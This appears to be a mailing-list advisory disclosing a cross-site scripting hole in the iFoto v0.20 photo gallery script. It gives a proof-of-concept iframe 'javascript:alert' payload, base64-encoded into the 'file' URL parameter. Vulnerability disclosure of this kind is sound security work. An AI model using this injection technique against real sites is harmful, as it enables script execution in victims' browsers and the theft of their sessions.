<<< Date Index >>>     <<< Thread Index >>>

iFoto v0.20-06/06/06



iFoto v0.20-06/06/06

Homepage:
http://ifoto.ireans.com/

Effected files:

XSS Vulnerability:

The dir path to show the image is base 64 encoded, so to attempt this XSS 
example we encode our codein base64.

The code we'll be using is javascript in an iframe tag. [IFRAME 
SRC="javascript:alert('XSS');"][/IFRAME]

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+